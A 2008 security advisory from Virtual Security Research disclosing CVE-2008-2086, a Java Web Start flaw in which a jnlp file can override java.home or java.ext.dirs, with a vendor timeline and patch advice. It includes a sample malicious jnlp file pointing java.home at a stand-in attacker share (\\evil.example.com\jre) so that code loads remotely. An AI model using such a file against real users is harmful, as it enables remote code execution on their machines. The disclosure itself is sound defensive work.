-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



                   Virtual Security Research, LLC.
                      http://www.vsecurity.com/
                         Security Advisory


- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Java Web Start File Inclusion via System Properties Override
 Release Date: 2008-12-03
  Application: Sun Java Runtime Environment / Java Web Start
     Versions: See below
     Severity: High
       Author: Timothy D. Morgan <tmorgan {a} vsecurity.com>
Vendor Status: Patch Released [3]
CVE Candidate: CVE-2008-2086
    Reference: http://www.vsecurity.com/bulletins/advisories/2008/JWS-props.txt

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
- -------------------
- From [1]:

 "Using Java Web Start technology, standalone Java software applications
  can be deployed with a single click over the network. Java Web Start
  ensures the most current version of the application will be deployed,
  as well as the correct version of the Java Runtime Environment (JRE)."


Vulnerability Overview
- ----------------------
On March 27th, VSR identified a vulnerability in Java Web Start related
to the execution of privileged applications.  This flaw could allow an
attacker to execute arbitrary code on a victim system if a user could be
convinced to visit a malicious web site.


Product Background
- ------------------
Java Web Start (JWS) applications are launched through specially
formatted XML files hosted on web sites with a "jnlp" file extension.
These files reference one or more "jar" files which are meant to be
downloaded and executed by client systems.  JWS applications are run in
unprivileged mode by default but may be run with full user privileges if
the jnlp file requests this access.  Privileged JWS applications must
have each jar file signed by the same trusted author in order to be
executed.  However, jnlp files are not signed and may be hosted by
third-party web sites.

In addition to specifying application components, the jnlp specification
permits application authors to supply certain System properties which
may be retrieved by the application through the System.getProperty() and
System.getProperties() methods.  Besides any user-supplied properties,
the Java VM also provides access to a number of sensitive runtime
settings through this interface.

More information on the jnlp format may be found in [2].


Vulnerability Details
- ---------------------
VSR discovered an unsafe behavior in the way properties are interpreted
when specified in jnlp files.  In certain versions of the Java Runtime
Engine (JRE), values supplied through jnlp files override existing
system defaults. Thus far, VSR has verified the following System
properties may be overridden:

  java.home
  java.ext.dirs
  user.home

Of particular interest are the java.home and java.ext.dirs properties.
If an attacker could lure a victim to open a malicious jnlp file which
references a trusted application, it may be executed without any
confirmation by the user.  However, as the application attempts to load
classes, it may trust the malicous java.home and/or java.ext.dirs value.
These paths could point to a malicious local or remote JRE or extensions
installation.  It appears that under Windows, UNC network paths may be
used for the java.home value. It is not yet known whether or not UNC
paths may be used for java.ext.dirs.

During testing, VSR found that Java Cryptography Extension (JCE) classes
failed to load when java.home was set to an invalid path.  However, by
setting this path to network share which hosted a valid JRE
installation, the JCE classes loaded correctly.  If such a network share
were hosted by the attacker, then arbitrary code could potentially be
loaded without restrictions, unbeknownst to the victim.

The following XML shows what a malicious jnlp file might look like.
Note that the malicious jnlp file would likely be very similar to the
ones users normally rely on with certain properties overriden in the
resources section.

  <jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">
    <information>
      <title>Trusted Application</title>
      <vendor>Trusted Vendor</vendor>
      <description>Trusted Application by Trusted Vendor</description>
      <homepage href="http://trusted.example.org/" />
      <offline-allowed />
    </information>
    <security><all-permissions /></security>
    <resources>
      <j2se version="1.5+" />
      <!-- Next line overrides the JRE's java.home System property -->
      <property name="java.home" value="\\evil.example.com\jre" />
      <jar href="signed-and-trusted-jce-dependent-library.jar" />
    </resources>
    <application-desc main-class="org.example.trusted.app.StartApp" />
  </jnlp>

To fully exploit this specific attack vector, an attacker would need to
remotely or locally host a malicious version of classes used by a
trusted application and then lure a user into opening a malicious jnlp
file. A firewall installed between the attacker and victim could
mitigate this issue if the victim's machine were restricted from
accessing the hosted network share.

Note that certain JWS applications may trust other System properties,
such as user.home, and use them in ways which could be exploited in
application-specific variants of this attack.


Versions Affected
- -----------------
During testing, VSR found the following JRE versions to be vulnerable:
    * 1.5.0_15 on Windows 
    * 1.6.0 on Windows
    * 1.5.0_13-b05-237 on Mac OS X (distributed by Apple)

Version 1.6.0_05 on Windows did not appear to be vulnerable.  However,
Sun recommends that any installations with the following versions be
updated:

    * JDK and JRE 6 Update 10 and earlier
    * JDK and JRE 5.0 Update 16 and earlier
    * SDK and JRE 1.4.2_18 and earlier

Sun reports that JRE 1.3.x is not affected, nor is JRE 6 Update 7 for
Intel Itanium.  For more information on versions affected and updates,
see [3].


Vendor Response
- ---------------
The following timeline details Sun's response to the reported issue:

2008-03-28    Sun was provided a draft advisory.

2008-03-28    An initial response was received from Sun.

2008-04-11    Sun reported that the issue could not be reproduced.

2008-04-11    VSR provided Sun additional exploit details.

2008-04-29    Sun reported the issue was reproduced and assigned
              an internal issue tracking number of CR 6694892.

2008-12-03    Sun Alert 244988 was released with an associated security
              update. 

Sun Alert 244988 may be obtained at:
  http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1


Recommendation
- --------------
Apply the JRE update as soon as possible.  The issue is fixed in:

    * JDK and JRE 6 Update 11 or later
    * JDK and JRE 5.0 Update 17 or later
    * SDK and JRE 1.4.2_19 or later

Review Sun Alert 244988 [3] for information on how to temporarily
disable Java Web Start to work around this issue.


Common Vulnerabilities and Exposures (CVE) Information
- ------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2008-2086 to this issue.  This is a candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


Acknowledgements
- ----------------
Thanks to George Gal for assistance in testing.  VSR would like to thank
Sun for cooperating in the patch development process.


- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1.  Java Web Start Technology
    http://java.sun.com/products/javawebstart/

2.  Java Web Start Architecture JNLP Specification & API Documentation
    http://java.sun.com/products/javawebstart/download-spec.html

3.  Sun Alert 244988
    http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Copyright 2008 Virtual Security Research, LLC.  All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJN1kCQ1RSUNR+T+gRAl6TAJ9LmdTw8S4K3RMpgseiw/AkHUc81ACeK+pn
cXqD3636+kFoMIUNlNhVZUw=
=yv7u
-----END PGP SIGNATURE-----